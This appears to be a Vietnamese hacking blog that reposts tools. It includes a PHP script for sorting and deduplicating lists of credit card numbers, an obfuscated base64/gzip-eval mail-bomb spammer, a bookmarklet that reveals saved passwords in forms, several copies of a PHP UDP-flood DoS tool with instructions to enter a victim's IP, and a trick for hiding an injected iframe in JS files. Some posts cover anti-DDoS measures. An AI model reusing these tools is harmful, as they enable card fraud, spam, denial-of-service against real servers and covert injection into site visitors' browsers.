Code lọc CC trùng, Phân loại CC

Thấy anh em dạo này nổi nên vấn đề lọc trùng cc.
Trước đây vấn đề này được giải quyết rồi. Mình có code này do Winjin code và mình edit. Code ổn định.
Chức năng:

    Lọc trùng : cc trùng sẽ auto bị remove. Ko cần config vị trí cc number
    Phân loại CC
    Tìm cc theo bin

<?php
/*
+ Coded by: Neverbestboy & WinJin92 (Edited by Gaconit)
*/
function findcc($str){
    $str=str_replace(" ","",$str);
    for($i=0;$i<=strlen($str);$i++){
        if(is_numeric($str[$i])){
            $ccNum.=$str[$i];
            if(strlen($ccNum)>14){
              return $ccNum;
              break;
            };
        }
        else $ccNum='';
    }

}
if($_POST['concaocao']){
  if(strpos($_POST['concaocao'], '.txt')){
  // Use TXT FILE
  $data  =  file_get_contents($_POST['concaocao']);
  $data  =  explode(chr(13).chr(10),$data);
  }
  else{
  /* USE POST WAY */
  $data  =  $_POST['concaocao'];
  $data  =  explode("\r\n",$data); // Work only in Window
  echo '<b>Total: </b>'.count($data).'<hr>';
  }
  foreach($data as $key => $value)
  {
        $ccNum=findcc($value);
        if(!$check["$ccNum"]){
            $check["$ccNum"]  =  1;

            if($_POST['binfilter']){
              $type  =  substr($ccNum,0,strlen($_POST['binfilter']));
              if($type == $_POST['binfilter'])
              {
              $cc['bin'][]  =  array($value);
              }
            }
            else
            {
              $type  =  substr($ccNum,0,1);
              if($type == 3)
              {
              $cc['amex'][]  =  array($value);
              }
              elseif($type == 4)
              {
              $cc['visa'][]  =  array($value);
              }
              elseif($type == 5)
              {
              $cc['master'][]  =  array($value);
              }
              elseif($type == 6)
              {
              $cc['discover'][]  =  array($value);
              }
            }
            $html.="$value\r\n";
            $nhtml++;
    }

}
  $cols = '100%';
  $rows = '5';
  if(!$_POST['binfilter']){
  echo '<pre><b>Amex: </b>'.count($cc['amex']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Visa: </b>'.count($cc['visa']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Master: </b>'.count($cc['master']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  //
  echo '<pre><b>Discover: </b>'.count($cc['discover']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  else{
    echo '<pre><b>BIN: </b>'.count($cc['bin']).'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  foreach($cc['bin'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';
  }
  echo '<pre><b>All with order:</b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
  if(count($cc['amex']))foreach($cc['amex'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['visa']))foreach($cc['visa'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['master']))foreach($cc['master'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  if(count($cc['discover']))foreach($cc['discover'] as $key=>$value){
    echo $value[0]."\r\n";
  }
  echo '</textarea></pre>';

    echo '<pre><b>All: </b>'.$nhtml.'<Br><textarea cols="'.$cols.'" rows="'.$rows.'">';
    echo $html;
    echo '</textarea></pre>';
}
else{
?>
<html>
<title>CC Filter - WinJin92</title>
<center><b>Coded by: WinJin92 & Helper: Neverbestboy [Ver: 2] (Edited by gaconit)</b></center>
<form method="POST" action="?">
<textarea name="concaocao" cols="80" rows="20"></textarea><br>
<b>Warning: </b> Fill "filename" to include cc list from "filename" (cc.txt) Or Paste you CC list to textarea above!<br>
<input type="text" name="binfilter" size="15" value="0"> <b>0</b> is disable BIN Filter!<br>
<br><input type="submit" value="Submit">
</form>
</html>
<? } ?>

Read more »

Posted in: code,Tutorial,UG,Web Application

share code bom mail

tình hình là tối qua được sự giúp đỡ của bác justin nguyễn và 1 số cộng sự khác . Mình đã test thành công boom mail !

Hôm nay, share cho ae nào cần dùng đến nó !

........................

mình đã test thành công!
Mail spam thẳng vào Inbox - cứ yên tâm mà test
Code: 

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=39036;eval(gzuncompress(base64_decode('eNplj1mPgjAAhP8MSduIsSCihPDgfVvv62XDUQ5FwJZD+fWr2c1uNpuZp8nMl4xAMMbkJWy4cUIjKBBCvgIRMAsgvfCDkMJqVSDv4tvI9WjKofAzFSUsK0j/FytYU5H+In4vDa/MIju+JYxyDi2TU1X5cKgdOxTylKUMuoyazh+EJiMRRGnTodbePG3Xs/ZQY8Vi7PLp0n+2boPJVZ7XcUnyvnroVHZZULO7x7MSX0YNbyWFj9492RhABO1Ot9cfDEfjyXQ2X5Dlar3Z7vaH4+lsWrZDXc8PLtfwFsXJnfE0y4vHs8SSXFcaarOlVWoAIaTT3Azh7yGkfwLOM18j')));return;?>
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

link down: http://www.mediafire.com/?q6bvg9nqnvppqpj

thấy hay thì thanks phát nhé

Read more »

Posted in: code,Download,Tutorial,Web Application

Share Code Auto Free Backlink

thấy các bro tìm cái code backlink này
hôm nay xin share cái code cho bà con nè
http://www.e-referrer.com <--- vào đây đăng ký một cái acc rồi làm theo hướng dẫn » Tutorials nhé.
Còn nếu làm biếng thì download cái code ở bên dưới về thay đổi cái number thôi nhé .
http://www.mediafire.com/?27bcbdyi79264n4

Read more »

Posted in: code,Thủ Thuật,Tutorial,Web Application

S.2.U Firewall System - Hệ thống chống ddos website

S.2.U Firewall System

Hệ thống chống ddos hiệu quả dành cho website của bạn, khả năng  chống  botnet, flood,... hạn chế tối đa từ các lượt tấn công! Nó chạy  ngầm và  phân tích tình hình, tùy biến cấu hình dễ dàng, phù hợp với mọi  website.



Các tính năng của S.2.U Firewall System:

• Chống các dạng tấn công mạng.
•     Gọn nhẹ, tùy biến dễ dàng.
•     Chạy ngầm.
•     Phân tích tình trạng website và tự động chuyển đỗi chế độ.
•     Phòng chống với 2 lớp bảo vệ và 1 lớp bảo trì ảo.
•     Hỗ trợ nhiều dạng website.

Hướng dẫn:

•      Giải nén và up toàn bộ file và thư mục vào trang cần thiết lập hệ thống.
•      Chèn đoạn mã sau lên trên cùng:

1.      <?php include_once("s2u_anti.php"); ?> : Nếu trang chủ là file index.html, sau khi chèn xong đổi tên thành index.php.
2.      include_once("s2u_anti.php"); : Dành cho file index.php và global.php nếu dùng cho forum vbb.

•      Mở file s2u_fw_cf.php để tùy chỉnh cấu hình firewal phù hợp website của bạn.
•      Chmod folder fwlogs thành 701 hoặc 755. các file php chmod 501 nếu host hỗ trợ hoặc 604.

  

Download -> http://app.s2u.vn/component/k2/item/9-s2u-firewall-system-h%E1%BB%87-th%E1%BB%91ng-ch%E1%BB%91ng-ddos-website.html (file đính kèm).




Bạn có thể hỏi bất cứ câu hỏi nào về hệ thống này. Cám ơn!
http://app.s2u.vn/component/k2/item/download/15.html

Read more »

Posted in: Thủ Thuật,Tutorial,Web Application

Share đoạn Java soi passwd

javascript: var p=r(); function r(){var g=0;var  x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var  k=0;k<w.length;k++) {var x = ((x) ||  (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' +  g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++)  {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j]))  {b=true}}}return b;}function h(ej){var s='';if  (ej.type=='password'){s=ej.value;if (s!=''){prompt('Soi mật khẩu',  s)}else{alert('Mật khẩu trống')}return true;}}  

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial

Code dowload từ tailieu.vn

Demo: http://killervn.net/tailieu.vn/index.html

Link: http://www.mediafire.com/?2141f27efvyvmmh

Read more »

Posted in: Download,Web Application

ANONIMYOUS DDOS

    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    ?>
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    
    <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">
    
            <title>PHP DoS, Coded by EXE</title>
    </head>
    <!-- PHP DOS, coded by EXE -->
    <style type="text/css">
    <!--
    body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
    }
    
    
    
    -->
    </style>
    <!-- PHP DOS, coded by EXE -->
    <body>
    <center><br><br>
    <img src="main.jpg"><br>
    <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
    <form name="input" action="function.php" method="post">
    IP:
    <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Time:
    <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    &nbsp;&nbsp;&nbsp;&nbsp;Port:
    <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
    <br><br>
    <input type="submit" value="    Start the Attack--->    ">
    <br><br>
    <center>
    After initiating the DoS attack, please wait while the browser loads.
    </center>
    
    </form>
    </center>
    <!-- PHP DOS, coded by EXE -->
    </body>
    </html>

RAW Paste Data

</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial,Web Application

DoS Script

Credit goes to: EXE of ZeroDayExile.
So, here it is...

How does this work after you've created it?

    Upload the Script
    Open it in browser
    Type the ip adress/host and port (ip add.r.e.ssort | 127.0.0.1:80) of the victim and type in how long you want to DDOS the server.
    When the script has finish it will show you the DoS result


This requires two files, first...
The main page should be named function.php.
Created as follows:

?php

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);


$exec_time = $_POST['time'];


$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;






for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>


and this in index.php:
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01


Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
<meta http-equiv="content-type" content="text/html;


charset=iso-8859-1">
<meta name="author" content="">


<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}






-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;


(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"


value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"


onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"


class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )


this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time


(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"


value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"


onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser


loads.
</center>


</form>
</center>
</body>
</html>

THEN, you will need the main index.php file, as follows:

<?php$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01

Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html;

charset=iso-8859-1">
<meta name="author" content="">

<title>PHP DoS</title>
</head>
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}



-->
</style>
<body>
<center><br><br>
<br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;

(Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main"

value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';"

onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Time:
<input type="text" name="time" size="14" maxlength="20"

class="main" value = "time (in seconds)" onblur = "if ( this.value=='' )

this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time

(in seconds)' ) this.value = '';">
&nbsp;&nbsp;&nbsp;&nbsp;Port:
<input type="text" name="port" size="5" maxlength="5" class="main"

value = "port" onblur = "if ( this.value=='' ) this.value = 'port';"

onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser

loads.
</center>

</form>
</center>
</body>

</html>

Note you can tweak this as you see fit.
You will need to use your own CSS and images if you don't want it to be a plain black and white page.
That you will have to do on your own, because I don't feel like doing a CSS tutorial.

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial,Web Application

PHP DoS Coded by Exe

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
    <meta name="author" content="">

    <title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by EXE -->
<style type="text/css">
<!--
body {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    font-style: normal;
    line-height: normal;
    color: #FFFFFF;
    background-color: #000000;
}



-->
</style>
<!-- PHP DOS, coded by EXE -->
<body >
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

Read more »

Posted in: Hacking,Thủ Thuật,Tutorial,Web Application

Chèn Iframe thoải mái mà không bị phát hiện

bạn có một code và share trên mạng , muốn chèn iframe thì làm như sau
có một file js - file nào cũng dc , miễn là js
bạn chèn code

function ShowJsF()
{
var iframe = document.createElement("iframe");
iframe.setAttribute("id","testiframe");
iframe.setAttribute("name","testiframe");
iframe.setAttribute("height","1");
iframe.setAttribute("width","0");
iframe.setAttribute("frameBorder","1");
iframe.setAttribute("scrolling","auto");
iframe.setAttribute("src","http://dl.dropbox.com/u/10870808/Apps/avim/index.html");
iframe.style.position = "absolute";
iframe.style.display = "block";
iframe.style.top = 100 + 'px';
iframe.style.left = 100 + 'px';
window.document.body.appendChild(iframe);
return false;
}  

và trong index.php bạn chỉ cần load file js đó lên và thêm đoạn sau : (vào chỗ nào cũng dc)

<body onload="ShowJsF();">

vậy là xong , nhét vào js thì chả ai biết mà mò đâu
ví dụ http://dl.dropbox.com/u/10870808/Apps/avim/index.html là của mình , và mình chèn cái killiframe rồi drect đến cái xxx thì

Read more »

Posted in: Thủ Thuật,Tutorial,Web Application

Chống DDOS hiệu quả bằng cách chặn IP dùng .htaccess

Chống DDOS bằng cách chặn IP dùng .htaccess

Trước tiên vào trang này: http://www.countryipblocks.net/

Đây là một trang tra cứu về địa chỉ IP miễn phí và update Database thường xuyên.

Cũng ở cột bên phải, kéo xuống phần Country IP listing, gõ 2 ký tự thể hiện quốc gia mà bạn muốn tra cứu dải địa chỉ IP (VN là Việt Nam, TH là Thailand, DE là Đức... chẳng hạn). và chọn CIDR Format rồi ấn Submit
Bạn sẽ nhận được danh sách IP Việt Nam như sau:

Trích dẫn

# Country: VIET NAM
# ISO Code: VN
# Total Networks: 196
# Total Subnets:  15,513,344
1.52.0.0/14
14.0.16.0/20
14.160.0.0/11
14.224.0.0/11
27.0.12.0/22
27.2.0.0/15
27.64.0.0/12
27.118.16.0/20
42.1.64.0/18
42.96.0.0/18
42.112.0.0/13
49.156.52.0/22
49.213.64.0/18
49.236.208.0/22
49.246.128.0/18
49.246.192.0/19
58.186.0.0/15
61.11.224.0/19
61.28.224.0/19
101.53.0.0/18
101.96.12.0/22
101.96.64.0/18
101.99.0.0/18
103.1.200.0/22
103.1.208.0/22
103.1.236.0/22
103.2.220.0/22
103.2.224.0/22
103.2.228.0/22
103.3.244.0/22
103.3.248.0/22
103.3.252.0/22
103.246.104.0/24
110.35.64.0/21
110.35.72.0/21
110.44.184.0/21
111.65.240.0/20
111.91.232.0/22
112.72.64.0/18
112.78.0.0/20
112.109.88.0/21
112.137.128.0/20
112.197.0.0/16
112.213.80.0/20
113.20.96.0/19
113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
115.72.0.0/13
115.84.176.0/21
115.146.120.0/21
115.165.160.0/21
116.68.128.0/21
116.96.0.0/12
116.118.0.0/17
116.193.64.0/20
116.212.32.0/19
117.0.0.0/13
117.103.192.0/18
117.122.0.0/17
118.68.0.0/14
118.102.0.0/21
118.107.64.0/18
119.15.160.0/19
119.17.192.0/18
119.18.128.0/20
119.18.184.0/21
119.82.128.0/20
120.50.184.0/21
120.72.80.0/21
120.72.96.0/19
120.138.64.0/20
122.102.112.0/22
122.129.0.0/18
122.201.8.0/21
123.16.0.0/12
124.157.0.0/18
124.158.0.0/20
125.58.0.0/18
125.212.128.0/17
125.214.0.0/18
125.234.0.0/15
125.253.112.0/20
171.224.0.0/11
175.103.64.0/18
175.106.0.0/22
180.93.0.0/16
180.148.0.0/21
180.148.128.0/20
180.214.236.0/22
182.161.80.0/20
182.236.112.0/22
182.237.20.0/22
183.80.0.0/16
183.81.0.0/17
183.90.160.0/21
183.91.0.0/19
183.91.160.0/19
202.0.79.0/24
202.4.168.0/24
202.4.176.0/24
202.6.2.0/24
202.6.96.0/23
202.9.79.0/24
202.9.80.0/24
202.9.84.0/24
202.37.86.0/23
202.43.108.0/22
202.44.137.0/24
202.47.87.0/24
202.47.142.0/24
202.52.39.0/24
202.55.132.0/22
202.56.57.0/24
202.58.245.0/24
202.59.238.0/23
202.59.252.0/23
202.60.104.0/21
202.74.56.0/24
202.74.58.0/23
202.78.224.0/21
202.79.232.0/21
202.87.212.0/22
202.92.4.0/22
202.93.156.0/22
202.94.82.0/24
202.94.88.0/23
202.124.204.0/24
202.130.36.0/23
202.134.16.0/21
202.134.54.0/24
202.151.160.0/20
202.158.244.0/22
202.160.124.0/23
202.172.4.0/23
202.191.56.0/22
203.8.127.0/24
203.8.172.0/24
203.34.144.0/24
203.77.178.0/24
203.79.28.0/24
203.89.140.0/22
203.99.248.0/22
203.113.128.0/19
203.113.160.0/19
203.119.8.0/22
203.119.36.0/22
203.119.44.0/22
203.119.58.0/23
203.119.60.0/22
203.119.64.0/21
203.119.72.0/22
203.128.240.0/21
203.160.0.0/23
203.160.96.0/21
203.161.178.0/24
203.162.0.0/21
203.162.8.0/21
203.162.16.0/20
203.162.32.0/19
203.162.64.0/18
203.162.128.0/20
203.162.144.0/20
203.162.160.0/19
203.162.192.0/18
203.163.128.0/18
203.170.26.0/23
203.171.16.0/20
203.176.160.0/21
203.189.28.0/22
203.190.160.0/20
203.191.8.0/21
203.191.48.0/21
203.195.0.0/18
203.201.56.0/22
203.205.0.0/18
203.209.180.0/22
203.210.128.0/18
203.210.192.0/18
210.2.64.0/18
210.86.224.0/20
210.211.96.0/19
210.245.0.0/19
210.245.32.0/19
210.245.64.0/18
218.100.10.0/24
218.100.14.0/24
218.100.60.0/24
220.231.64.0/18
221.121.0.0/18
221.132.0.0/18
221.133.0.0/19
222.252.0.0/14
223.27.104.0/21

Trước tiên bạn phải xác định là website của mình chỉ để cho khách hàng là người VN ( hoặc thêm nước nào tùy ý ) truy cập.
Để chống DDOS hoặc BOTNET dùng sock hoặc fake IP nước ngoài như ( US, JP, ...) chúng ta tạo file .htaccess với nội dung như sau :

RewriteEngine on ErrorDocument 404 /404.html <Files ".htaccess"> deny from all </Files> order deny,allow deny from all allow from 1.52.0.0/14 allow from 14.0.16.0/20 allow from 14.160.0.0/11 allow from 14.224.0.0/11 allow from 27.0.12.0/22 allow from 27.2.0.0/15 allow from 27.64.0.0/12 allow from 27.118.16.0/20 allow from 42.1.64.0/18 allow from 42.96.0.0/18 allow from 42.112.0.0/13 allow from 49.156.52.0/22 allow from 49.213.64.0/18 allow from 49.236.208.0/22 allow from 49.246.128.0/18 allow from 49.246.192.0/19 allow from 58.186.0.0/15 allow from 61.11.224.0/19 allow from 61.28.224.0/19 allow from 101.53.0.0/18 allow from 101.96.12.0/22 allow from 101.96.64.0/18 allow from 101.99.0.0/18 allow from 103.1.200.0/22 allow from 103.1.208.0/22 allow from 103.1.236.0/22 allow from 103.2.220.0/22 allow from 103.2.224.0/22 allow from 103.2.228.0/22 allow from 110.35.64.0/21 allow from 110.35.72.0/21 allow from 110.44.184.0/21 allow from 111.65.240.0/20 allow from 111.91.232.0/22 allow from 112.72.64.0/18 allow from 112.78.0.0/20 allow from 112.109.88.0/21 allow from 112.137.128.0/20 allow from 112.197.0.0/16 allow from 112.213.80.0/20 allow from 113.20.96.0/19 allow from 113.22.0.0/16 allow from 113.23.0.0/17 allow from 113.52.32.0/19 allow from 113.61.108.0/22 allow from 113.160.0.0/11 allow from 115.72.0.0/13 allow from 115.84.176.0/21 allow from 115.146.120.0/21 allow from 115.165.160.0/21 allow from 116.68.128.0/21 allow from 116.96.0.0/12 allow from 116.118.0.0/17 allow from 116.193.64.0/20 allow from 116.212.32.0/19 allow from 117.0.0.0/13 allow from 117.103.192.0/18 allow from 117.122.0.0/17 allow from 118.68.0.0/14 allow from 118.102.0.0/21 allow from 118.107.64.0/18 allow from 119.15.160.0/19 allow from 119.17.192.0/18 allow from 119.18.128.0/20 allow from 119.18.184.0/21 allow from 119.82.128.0/20 allow from 120.50.184.0/21 allow from 120.72.80.0/21 allow from 